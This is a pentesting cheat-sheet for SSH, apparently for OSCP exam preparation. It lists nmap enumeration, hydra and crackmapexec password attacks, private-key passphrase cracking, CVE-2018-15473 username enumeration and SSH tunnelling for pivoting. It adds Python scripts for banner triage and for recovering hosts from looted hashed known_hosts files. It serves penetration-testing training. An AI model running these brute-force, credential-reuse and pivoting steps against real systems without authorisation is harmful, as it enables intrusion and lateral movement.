FOOTHOLD Methodology Cheat-sheet
22

SSH

linux

OpenSSH enumeration, auth method discovery, username enumeration (CVE-2018-15473), password/key brute-forcing, and using SSH for tunneling/pivoting (local/remote/dynamic forwards).


Commands

nmap ✓ EXAM-SAFE
nmap -p 22 -sV -sC {{RHOST}}
SSH version detection plus the default NSE scripts (ssh-hostkey). Note that ssh-auth-methods is not in nmap's default category; run it explicitly as in the next entry. HackTricks — Pentesting SSH
nmap ✓ EXAM-SAFE
nmap -p 22 --script ssh2-enum-algos,ssh-auth-methods,ssh-hostkey,sshv1 {{RHOST}}
Enumerates the supported cipher/KEX algorithms, the accepted authentication methods and the host key fingerprints. HackTricks — Pentesting SSH
nc ✓ EXAM-SAFE
nc {{RHOST}} {{RPORT}}
Banner grabbing: a raw connection to read the OpenSSH version and an OS hint (the server sends its identification string first, so no input is needed). HackTricks — Pentesting SSH
ssh ✓ EXAM-SAFE
ssh -v {{USER}}@{{RHOST}} -p {{RPORT}}
Verbose connection to see the accepted auth methods (publickey, password, keyboard-interactive) in the "Authentications that can continue" line. HackTricks — Pentesting SSH
ssh-audit ✓ EXAM-SAFE
ssh-audit {{RHOST}}:{{RPORT}}
SSH configuration/algorithm audit with known-vulnerability flags. HackTricks — Pentesting SSH
hydra ✓ EXAM-SAFE
hydra -L {{WORDLIST}} -P {{WORDLIST}} -t 4 ssh://{{RHOST}}:{{RPORT}}
SSH password brute-force (low thread count so as not to trip MaxStartups limits). HackTricks — Pentesting SSH
hydra ✓ EXAM-SAFE
hydra -l {{USER}} -P {{WORDLIST}} -t 4 ssh://{{RHOST}}:{{RPORT}}
Password dictionary attack against a single known user. TJnull PWK/OSCP Prep guide
crackmapexec ✓ EXAM-SAFE
crackmapexec ssh {{RHOST}} -u {{USER}} -p {{PASS}}
SSH credential validation / spray check (cme/nxc ssh module). HackTricks — Pentesting SSH
ssh-keygen ✓ EXAM-SAFE
ssh-keygen -lf id_rsa
Fingerprint of a captured private/public key (loot triage; -lf works on either half of the pair, so use it to match loose keys against authorized_keys). HackTricks — Pentesting SSH
ssh2john ✓ EXAM-SAFE
ssh2john id_rsa > hash.txt && john --wordlist={{WORDLIST}} hash.txt
Cracking the passphrase of a password-protected private key. PayloadsAllTheThings — SSH
ssh ✓ EXAM-SAFE
chmod 600 id_rsa && ssh -i id_rsa {{USER}}@{{RHOST}} -p {{RPORT}}
Logging in with a captured private key (the key file must not be group- or world-readable; 600 works). HackTricks — Pentesting SSH
python ⚠ RESTRICTED
python3 ssh_enum.py {{RHOST}} {{WORDLIST}}
CVE-2018-15473 username enumeration on OpenSSH 7.7 and older (fixed in 7.8): valid and invalid usernames get a different response/timing to a malformed auth request. HackTricks — Pentesting SSH
ssh ✓ EXAM-SAFE
ssh -L {{LPORT}}:127.0.0.1:{{RPORT}} {{USER}}@{{RHOST}}
Local port forward: bring a target service that listens only on localhost to Kali. HackTricks — SSH Tunneling
ssh ✓ EXAM-SAFE
ssh -D {{LPORT}} {{USER}}@{{RHOST}}
Set up a dynamic SOCKS proxy: pivot into the internal network through proxychains. HackTricks — SSH Tunneling
ssh ✓ EXAM-SAFE
ssh -R {{RPORT}}:127.0.0.1:{{LPORT}} {{USER}}@{{RHOST}}
Remote port forward: make a Kali service reachable through the target (firewall bypass / reverse pivot). HackTricks — SSH Tunneling

Overview

SSH (default 22/tcp) is critical on OSCP machines both as a foothold (weak password / captured key) and as a pivot tool. First extract the banner and the supported auth methods, then attempt access by brute-force or with captured keys.

Enumeration

  • Read the ssh-auth-methods output from the nmap NSE scripts: if password is enabled, brute-force makes sense; if it is publickey only, switch to hunting for keys.
  • Detect old/weak configuration (CBC ciphers, SSHv1) with ssh-hostkey and ssh2-enum-algos.
  • If the OpenSSH version in the banner is 7.7 or older, username enumeration (CVE-2018-15473) comes into play (fixed in 7.8; distributions backport the fix without changing the version string, so treat the banner as a hint and confirm by testing).
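The triage described in the three bullets above, as an added example (not part of the original cheat-sheet): it parses an OpenSSH identification string, flags the CVE-2018-15473 version range, pulls the method names out of nmap's ssh-auth-methods block and turns the two into the next step. The banners and the nmap snippet are constructed here, not captured from any host; `grab_banner()` is the only function that touches the network and is not needed for the offline part.

```python
#!/usr/bin/env python3
"""SSH banner / auth-method triage (added example, not from the original page)."""
import re
import socket
from typing import List, Optional

# Constructed sample data for offline use; none of these came from a real host.
SAMPLE_BANNERS = [
    "SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u7",
    "SSH-2.0-OpenSSH_7.7",
    "SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5",
    "SSH-2.0-dropbear_2019.78",
]

# Constructed nmap ssh-auth-methods output (nmap's layout, values chosen for this example).
SAMPLE_NMAP_AUTH = """\
PORT   STATE SERVICE
22/tcp open  ssh
| ssh-auth-methods:
|   Supported authentication methods:
|     publickey
|_    password
"""

BANNER_RE = re.compile(
    r"^SSH-(?P<proto>[\d.]+)-OpenSSH_(?P<ver>\d+\.\d+)(?:p(?P<patch>\d+))?(?:\s+(?P<os>.*))?$"
)


def grab_banner(host: str, port: int = 22, timeout: float = 5.0) -> str:
    """Raw banner grab (what `nc host port` shows): the server speaks first."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        return s.recv(256).decode("ascii", "replace").splitlines()[0]


def parse_openssh_banner(banner: str) -> Optional[dict]:
    """Split an OpenSSH identification string into version, patch level and OS hint.
    Returns None for non-OpenSSH servers (dropbear, libssh, ...)."""
    m = BANNER_RE.match(banner.strip())
    if not m:
        return None
    major, minor = (int(x) for x in m.group("ver").split("."))
    return {
        "proto": m.group("proto"),
        "version": (major, minor),
        "patch": int(m.group("patch")) if m.group("patch") else None,
        "os_hint": m.group("os") or "",
    }


def maybe_cve_2018_15473(banner: str) -> bool:
    """CVE-2018-15473 (username enumeration) affects OpenSSH up to and including 7.7;
    it was fixed in 7.8. Distros backport fixes without bumping the version, so True
    means 'worth testing', not 'confirmed vulnerable'."""
    info = parse_openssh_banner(banner)
    return info is not None and info["version"] <= (7, 7)


def parse_nmap_auth_methods(nmap_output: str) -> List[str]:
    """Pull the method names out of nmap's ssh-auth-methods block."""
    methods: List[str] = []
    in_block = False
    for line in nmap_output.splitlines():
        body = line.lstrip("|_ ").strip()
        if body.startswith("Supported authentication methods"):
            in_block = True
            continue
        if in_block:
            if not line.startswith("|") or not body or body.endswith(":"):
                break
            methods.append(body)
            if line.startswith("|_"):  # nmap marks the last line of a script block with |_
                break
    return methods


def plan(banner: str, methods: List[str]) -> dict:
    """Turn banner + auth methods into the next step the cheat-sheet describes."""
    m = {x.lower() for x in methods}
    if "password" in m or "keyboard-interactive" in m:
        next_step = "brute-force"  # hydra -t 4 with usernames from web/FTP/SMB enumeration
    elif "publickey" in m:
        next_step = "key-hunt"     # look for id_rsa in loot; ssh2john if passphrase-protected
    else:
        next_step = "unknown"
    return {
        "openssh": parse_openssh_banner(banner),
        "user_enum_candidate": maybe_cve_2018_15473(banner),
        "next_step": next_step,
    }


if __name__ == "__main__":
    methods = parse_nmap_auth_methods(SAMPLE_NMAP_AUTH)
    for b in SAMPLE_BANNERS:
        print(b, "->", plan(b, methods))
```

For a live target, replace the constructed banner with `grab_banner("{{RHOST}}", {{RPORT}})` and feed the real `nmap --script ssh-auth-methods` output to `parse_nmap_auth_methods`; the decision logic stays the same.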

Known Vulnerabilities

  • CVE-2018-15473: username enumeration in OpenSSH 7.7 and older. Valid users produce a different response time/behaviour. I counted it as restricted because in the exam it is an automated exploit; cross-check the resulting user list against other services (web, SMTP).
  • Algorithm downgrade on old versions; rarely a direct exploit in OSCP, more of a configuration note.

Exploitation / Auth

  • Run hydra against the usernames obtained from web/FTP/SMB enumeration. Keep the thread count low (-t 4): OpenSSH's MaxStartups/MaxAuthTries cut connections off early, and a high thread count produces false negatives.
  • Quickly validate passwords leaked from other services with crackmapexec ssh (password reuse is very common).
  • For a captured id_rsa, chmod 600 first; if it has a passphrase, crack it with ssh2john + john.

Pivot / Loot Notes

  • After access, collect id_rsa, authorized_keys and known_hosts from ~/.ssh/: gold for lateral movement.
  • known_hosts can reveal internal targets even when hashed (a HashKnownHosts entry is HMAC-SHA1 of the hostname under a per-line salt, so candidate hosts can be checked offline); use it to map the internal network.
  • Tunneling: local forward for internal services bound to localhost, dynamic SOCKS (+proxychains) for broad access into the internal network, remote forward to connect back to a Kali service behind a firewall.
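The known_hosts point above, worked through as an added example (not from the original page or from OpenSSH): hashed entries have the form `|1|<base64 salt>|<base64 HMAC-SHA1(salt, host)>`, so a looted file can be "cracked" by recomputing the HMAC for each candidate host (here every address in a /24 around a seed IP, plus `[ip]:port` variants, since OpenSSH hashes the bracketed form for non-default ports). The sample known_hosts lines, salts and key blobs are constructed inside the script; the /24 wordlist and the port 2222 guess are assumptions you would replace with what enumeration gave you.

```python
#!/usr/bin/env python3
"""Recover hostnames from hashed known_hosts entries (added example, not from the original page)."""
import base64
import hashlib
import hmac
import ipaddress
from typing import Dict, Iterable, List

HASH_MAGIC = "|1|"  # OpenSSH HashKnownHosts marker: |1|<b64 salt>|<b64 HMAC-SHA1(salt, host)>


def hash_host(host: str, salt: bytes) -> str:
    """Produce the exact host field OpenSSH writes when HashKnownHosts is on."""
    mac = hmac.new(salt, host.encode(), hashlib.sha1).digest()
    return HASH_MAGIC + base64.b64encode(salt).decode() + "|" + base64.b64encode(mac).decode()


# Constructed sample known_hosts: hosts, salts and (dummy) key blobs are invented for this example.
_SALT_A = bytes(range(20))
_SALT_B = bytes(range(20, 40))
SAMPLE_KNOWN_HOSTS = "\n".join([
    hash_host("10.10.10.5", _SALT_A) + " ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDUMMYKEYBLOB",
    hash_host("[10.10.10.7]:2222", _SALT_B) + " ssh-rsa AAAAB3NzaC1yc2EAAAADUMMYKEYBLOB",
    "bastion.corp.local ssh-rsa AAAAB3NzaC1yc2EAAAADUMMYKEYBLOB",  # unhashed entry
])


def candidate_hosts(seed_ip: str, ports: Iterable[int] = (2222,)) -> List[str]:
    """Wordlist: every address in the seed's /24, plus [ip]:port variants for non-22 ports.
    The /24 and the port list are assumptions; widen them with whatever enumeration found."""
    net = ipaddress.ip_network(f"{seed_ip}/24", strict=False)
    hosts = [str(ip) for ip in net.hosts()]
    return hosts + [f"[{h}]:{p}" for h in hosts for p in ports]


def crack_known_hosts(text: str, candidates: Iterable[str]) -> Dict[str, str]:
    """Map each known_hosts host field to a hostname. Unhashed fields are read directly;
    hashed fields are matched by recomputing HMAC-SHA1 under the line's own salt
    for every candidate (each line has its own salt, so there is no precomputation)."""
    cands = list(candidates)
    found: Dict[str, str] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        field = line.split()[0]
        if not field.startswith(HASH_MAGIC):
            found[field] = field.split(",")[0]  # unhashed field may list comma-separated aliases
            continue
        try:
            _, _, salt_b64, mac_b64 = field.split("|")
        except ValueError:
            continue  # malformed line, skip it
        salt = base64.b64decode(salt_b64)
        target = base64.b64decode(mac_b64)
        for c in cands:
            if hmac.compare_digest(hmac.new(salt, c.encode(), hashlib.sha1).digest(), target):
                found[field] = c
                break
    return found


if __name__ == "__main__":
    hits = crack_known_hosts(SAMPLE_KNOWN_HOSTS, candidate_hosts("10.10.10.0"))
    for field, host in hits.items():
        print(f"{host:<22} <- {field[:40]}")
```

To check a single guess with the real tool instead, `ssh-keygen -F 10.10.10.5 -f known_hosts` prints the matching line (hashed or not); the script above is for running a whole candidate list against a looted file offline.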

Gotchas

  • SSH rejects a private key that is group- or world-readable; chmod 600 (or 400) fixes it.
  • Some machines disable password auth and accept keys only; check the auth-methods output before spending time on brute-force.
  • If hydra stalls because of rate limiting, try -t 1 and -W 1.

Related techniques


Sources
